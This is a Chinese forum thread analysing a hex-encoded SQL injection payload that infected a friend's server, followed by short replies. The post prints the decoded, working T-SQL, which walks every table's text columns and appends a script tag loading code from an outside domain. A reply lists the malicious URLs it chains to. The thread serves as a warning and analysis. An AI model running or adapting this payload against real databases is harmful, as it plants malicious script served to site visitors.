一个数据库挂马的例子

frozenrain

今天朋友发给我一段数据说服务器崩了，让我给分析一下，加密数据见附件。
打开文件，发现是以%隔开的，很明显是16进制，把16进制转化为字符串后得到。
;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt（0x4400650063006C00610072006500200040005400200056006............省略)
很明显是SQL挂马，中间那段数据没解出来，凭经验以0x开头的数据也是16进制的，转化为字符看看。
中间数据解码后，得到最终结果：

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://z360.net></script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor aS NvArChAR(4000));ExEc(@S);--@S NvArCHaR(4000);SeT @S=CaSt(Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<scri

数据库中被插入了<script src=http://z360.net></script>'，google一下z360.net 发现最近被这个挂马的站很多。
提醒大家注意。

Hmily

太深奥了，这个不懂。。。学习。。。

xiaopeng018

Log is generated by FreShow.
[wide]http://z360.net
    [frame]http://z360.net/0.htm
        [frame]http://ddyyb.2288.org/fkzd/16.htm  //连接超时
    [script]http://js.tongji.linezing.com/464215/tongji.js

kongzi

这个应该是个存储过程吧，里面用到了数据库的指针

mycsy

没好好格式化下代码 本事不行这么看老费劲

xieyuzhe

这个高手了，就这样也看懂了

muye

无法学习，只能膜拜，能提供原始样本不？